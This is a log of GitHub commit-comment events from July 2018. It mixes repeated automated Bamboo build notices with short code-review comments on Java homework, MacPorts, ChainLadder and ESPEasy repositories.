{"id":"8034425543","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876075,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-29T18:30:19Z","updated_at":"2018-07-29T18:30:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:30:19Z"}
{"id":"8034425936","type":"CommitCommentEvent","actor":{"login":"chymanfx"},"repo":{"name":"chymanfx/libzmq"},"payload":{"comment":{"id":29876077,"position":null,"line":null,"path":null,"commit_id":"67d545548bdfc7ef1a73c8af188f4a8b489b2071","created_at":"2018-07-29T18:30:35Z","updated_at":"2018-07-29T18:30:35Z","author_association":"OWNER","body":"The PYTHON dependency has been removed in a previous commit, so can remove here too.\r\n\r\nAdded exclude on WIN32 due to issues with symlinks in docs"}},"created_at":"2018-07-29T18:30:35Z"}
{"id":"8034426040","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876078,"position":8,"line":8,"path":"src/homework/collection1/FirstTask.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:30:40Z","updated_at":"2018-07-29T18:30:40Z","author_association":"NONE","body":"Программируем на уровне интерфейсов, а не реализации - поэтому List"}},"created_at":"2018-07-29T18:30:40Z"}
{"id":"8034426404","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876080,"position":8,"line":8,"path":"src/homework/collection1/FirstTask.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:30:57Z","updated_at":"2018-07-29T18:30:57Z","author_association":"NONE","body":"в данном случае надо было выбрать LinkedList"}},"created_at":"2018-07-29T18:30:57Z"}
{"id":"8034426440","type":"CommitCommentEvent","actor":{"login":"chiefmurph"},"repo":{"name":"mages/ChainLadder"},"payload":{"comment":{"id":29876081,"position":null,"line":null,"path":null,"commit_id":"2ef874cf0720a54c0dbcddae66167993dffc1df2","created_at":"2018-07-29T18:30:58Z","updated_at":"2018-07-29T18:30:58Z","author_association":"CONTRIBUTOR","body":"I agree that providing for a 3-year weighted average, say, Mack calculation would be a useful enhancement to the MackChainLadder interface. Comments: 1) Since the new functionality only manipulates the weights, why not make limitOriginPeriods an exported method and MackCL could be called with the argument weights=limitOriginPeriods (weights,origin.incl).\r\n2) It is often the case that the number of origin.incl changes by dev period. It would be nice if origin.incl could be a vector, like alpha can be.\r\n3) Since you are adding \"functionality in practice\" what about implementing something like \"7-year average excluding hi and low\" while you are at it?\r\n"}},"created_at":"2018-07-29T18:30:58Z"}
{"id":"8034426601","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876083,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-29T18:31:06Z","updated_at":"2018-07-29T18:31:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:31:06Z"}
{"id":"8034426902","type":"CommitCommentEvent","actor":{"login":"pmetzger"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29876084,"position":10,"line":10,"path":"sysutils/packer/Portfile","commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-29T18:31:18Z","updated_at":"2018-07-29T18:31:18Z","author_association":"MEMBER","body":"I think the real problem is that `port lint` doesn't catch this or a half dozen other important things (like `size` etc.) People get tired and don't always notice everything, but machines are pretty good at catching stuff."}},"created_at":"2018-07-29T18:31:18Z"}
{"id":"8034427205","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876090,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-29T18:31:31Z","updated_at":"2018-07-29T18:31:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:31:31Z"}
{"id":"8034427357","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876092,"position":26,"line":26,"path":"src/homework/collection1/FirstTask.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:31:38Z","updated_at":"2018-07-29T18:31:38Z","author_association":"NONE","body":"никакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T18:31:38Z"}
{"id":"8034427519","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876094,"position":32,"line":32,"path":"src/homework/collection1/FirstTask.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:31:46Z","updated_at":"2018-07-29T18:31:46Z","author_association":"NONE","body":"\r\nв методе main только проверка написанного, все остальное выносим в отдельные классы (утилитные например)"}},"created_at":"2018-07-29T18:31:46Z"}
{"id":"8034427892","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876096,"position":9,"line":9,"path":"src/homework/collection1/SecondTask.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:32:03Z","updated_at":"2018-07-29T18:32:03Z","author_association":"NONE","body":"не надо отступов в первой строчке метода"}},"created_at":"2018-07-29T18:32:03Z"}
{"id":"8034428141","type":"CommitCommentEvent","actor":{"login":"awakening95"},"repo":{"name":"awakening95/pcap_test-TCP_parcer"},"payload":{"comment":{"id":29876097,"position":null,"line":null,"path":null,"commit_id":"e0bbbfe2427de6bf7464884a20e2b83c1184342b","created_at":"2018-07-29T18:32:13Z","updated_at":"2018-07-29T18:32:13Z","author_association":"OWNER","body":"e0bbbfe2427de6bf7464884a20e2b83c1184342b"}},"created_at":"2018-07-29T18:32:13Z"}
{"id":"8034428321","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876098,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-29T18:32:22Z","updated_at":"2018-07-29T18:32:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:32:22Z"}
{"id":"8034428404","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876099,"position":41,"line":41,"path":"src/homework/collection1/SecondTask.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:32:26Z","updated_at":"2018-07-29T18:32:26Z","author_association":"NONE","body":"то же самое, выносим все в утилитные классы"}},"created_at":"2018-07-29T18:32:26Z"}
{"id":"8034428537","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876100,"position":37,"line":37,"path":"src/homework/collection1/SecondTask.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:32:33Z","updated_at":"2018-07-29T18:32:33Z","author_association":"NONE","body":"надо было использовать итератор"}},"created_at":"2018-07-29T18:32:33Z"}
{"id":"8034428678","type":"CommitCommentEvent","actor":{"login":"pmetzger"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29876102,"position":null,"line":null,"path":null,"commit_id":"0faec67c6645efce76ad42b216fb246c78fcef37","created_at":"2018-07-29T18:32:40Z","updated_at":"2018-07-29T18:32:40Z","author_association":"MEMBER","body":"Yah, I don't feel equipped to comment on the change so I didn't."}},"created_at":"2018-07-29T18:32:40Z"}
{"id":"8034428696","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876103,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-29T18:32:41Z","updated_at":"2018-07-29T18:32:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:32:41Z"}
{"id":"8034429482","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876104,"position":5,"line":5,"path":"src/homework/inharitance/Circle.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:33:17Z","updated_at":"2018-07-29T18:33:17Z","author_association":"NONE","body":"static final, т.к. для всех объектов этого класса будет одинаковая, а то в каждом объекте будет создаваться свой константа"}},"created_at":"2018-07-29T18:33:17Z"}
{"id":"8034429677","type":"CommitCommentEvent","actor":{"login":"awakening95"},"repo":{"name":"awakening95/pcap_test-TCP_parcer"},"payload":{"comment":{"id":29876105,"position":null,"line":null,"path":null,"commit_id":"e0bbbfe2427de6bf7464884a20e2b83c1184342b","created_at":"2018-07-29T18:33:25Z","updated_at":"2018-07-29T18:33:25Z","author_association":"OWNER","body":"e0bbbfe2427de6bf7464884a20e2b83c1184342b"}},"created_at":"2018-07-29T18:33:25Z"}
{"id":"8034429922","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876109,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-29T18:33:37Z","updated_at":"2018-07-29T18:33:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:33:37Z"}
{"id":"8034429965","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876110,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-29T18:33:40Z","updated_at":"2018-07-29T18:33:40Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-29T18:33:40Z"}
{"id":"8034430075","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876111,"position":17,"line":17,"path":"src/homework/inharitance/Circle.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:33:44Z","updated_at":"2018-07-29T18:33:44Z","author_association":"NONE","body":"не надо скобочек вокруг вычисления"}},"created_at":"2018-07-29T18:33:44Z"}
{"id":"8034430187","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876113,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-29T18:33:50Z","updated_at":"2018-07-29T18:33:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:33:50Z"}
{"id":"8034430227","type":"CommitCommentEvent","actor":{"login":"awakening95"},"repo":{"name":"awakening95/pcap_test-TCP_parcer"},"payload":{"comment":{"id":29876114,"position":null,"line":null,"path":null,"commit_id":"e0bbbfe2427de6bf7464884a20e2b83c1184342b","created_at":"2018-07-29T18:33:52Z","updated_at":"2018-07-29T18:33:52Z","author_association":"OWNER","body":"e0bbbfe2427de6bf7464884a20e2b83c1184342b"}},"created_at":"2018-07-29T18:33:52Z"}
{"id":"8034430441","type":"CommitCommentEvent","actor":{"login":"thomastech"},"repo":{"name":"TD-er/ESPEasy"},"payload":{"comment":{"id":29876115,"position":null,"line":null,"path":null,"commit_id":"28831be000a497fb990969bc412bab631450f66e","created_at":"2018-07-29T18:33:59Z","updated_at":"2018-07-29T18:33:59Z","author_association":"NONE","body":"@TD-er:\r\nA question about the proposed changes. In the previous releases we could do something like this:\r\n\r\n```\r\ncase PLUGIN_WEBFORM_SAVE: {\r\n  if (ExtraTaskSettings.TaskDeviceName[0] == 0) {          // User forgot to enter device name!\r\n     strcpy(ExtraTaskSettings.TaskDeviceName,\"DEFAULT_NAME_HERE\");  // Give standard name.\r\n  }\r\n//more code here..\r\n}\r\n```\r\nWith your new method, is this the equivalent something like this?\r\n```\r\ncase PLUGIN_WEBFORM_SAVE: {\r\n  if (getTaskDeviceName(event->TaskIndex) == \"\") {  \r\n      strcpy(getTaskDeviceName(event->TaskIndex),\"DEFAULT_NAME_HERE\");  // Need correct syntax for this!\r\n  }\r\n//more code here..\r\n}\r\n```\r\nOr should a companion function be added to your change log that safely sets the Device Name? A function prototype like this: setTaskDeviceName(struct EventStruct event, String& string);\r\n\r\n- Thomas"}},"created_at":"2018-07-29T18:33:59Z"}
{"id":"8034430543","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29876116,"position":10,"line":10,"path":"sysutils/packer/Portfile","commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-29T18:34:03Z","updated_at":"2018-07-29T18:34:03Z","author_association":"CONTRIBUTOR","body":"There's nothing syntactically or stylistically invalid about what was written; `port lint` does not have the information that would be needed to know this was an error."}},"created_at":"2018-07-29T18:34:03Z"}
{"id":"8034430647","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876117,"position":36,"line":36,"path":"src/homework/inharitance/Circle.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:34:07Z","updated_at":"2018-07-29T18:34:07Z","author_association":"NONE","body":"лишние отступы в методе"}},"created_at":"2018-07-29T18:34:07Z"}
{"id":"8034430883","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876118,"position":5,"line":5,"path":"src/homework/inharitance/EquilateralTriangle.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:34:16Z","updated_at":"2018-07-29T18:34:16Z","author_association":"NONE","body":"static"}},"created_at":"2018-07-29T18:34:16Z"}
{"id":"8034431727","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876120,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-29T18:34:53Z","updated_at":"2018-07-29T18:34:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:34:53Z"}
{"id":"8034431870","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876121,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-29T18:34:59Z","updated_at":"2018-07-29T18:34:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:34:59Z"}
{"id":"8034432646","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876124,"position":5,"line":5,"path":"src/homework/inharitance/ShapeUtils.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:35:28Z","updated_at":"2018-07-29T18:35:28Z","author_association":"NONE","body":"final"}},"created_at":"2018-07-29T18:35:28Z"}
{"id":"8034432812","type":"CommitCommentEvent","actor":{"login":"awakening95"},"repo":{"name":"awakening95/pcap_test-TCP_parcer"},"payload":{"comment":{"id":29876125,"position":77,"line":77,"path":"main.cpp","commit_id":"c5b50ff27903437d042a69813ac02da8b20ceb02","created_at":"2018-07-29T18:35:36Z","updated_at":"2018-07-29T18:35:36Z","author_association":"OWNER","body":"Done in e0bbbfe2427de6bf7464884a20e2b83c1184342b"}},"created_at":"2018-07-29T18:35:36Z"}
{"id":"8034433053","type":"CommitCommentEvent","actor":{"login":"awakening95"},"repo":{"name":"awakening95/pcap_test-TCP_parcer"},"payload":{"comment":{"id":29876126,"position":94,"line":87,"path":"main.cpp","commit_id":"c5b50ff27903437d042a69813ac02da8b20ceb02","created_at":"2018-07-29T18:35:46Z","updated_at":"2018-07-29T18:35:46Z","author_association":"OWNER","body":"Done in e0bbbfe2427de6bf7464884a20e2b83c1184342b"}},"created_at":"2018-07-29T18:35:46Z"}
{"id":"8034433367","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29876127,"position":10,"line":10,"path":"src/homework/inharitance/ShapeUtils.java","commit_id":"5579f77e0580eb5fe0dc24f3aae2f1cb9c8437fd","created_at":"2018-07-29T18:35:59Z","updated_at":"2018-07-29T18:35:59Z","author_association":"NONE","body":"надо было реализовать два метода, которые возвращают true-false\r\nвывод на консоль только для тестов!"}},"created_at":"2018-07-29T18:35:59Z"}
{"id":"8034433563","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876129,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-29T18:36:08Z","updated_at":"2018-07-29T18:36:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:36:08Z"}
{"id":"8034433594","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876130,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-29T18:36:09Z","updated_at":"2018-07-29T18:36:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:36:09Z"}
{"id":"8034434727","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876136,"position":4,"line":4,"path":"src/lesson7/Circle.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:37:01Z","updated_at":"2018-07-29T18:37:01Z","author_association":"NONE","body":"отступ между классом и полями"}},"created_at":"2018-07-29T18:37:01Z"}
{"id":"8034435019","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876140,"position":3,"line":3,"path":"src/lesson7/Perimeter.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:37:16Z","updated_at":"2018-07-29T18:37:16Z","author_association":"NONE","body":"отступ между классом/интерфейсом и методами"}},"created_at":"2018-07-29T18:37:16Z"}
{"id":"8034435126","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876141,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-29T18:37:21Z","updated_at":"2018-07-29T18:37:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:37:21Z"}
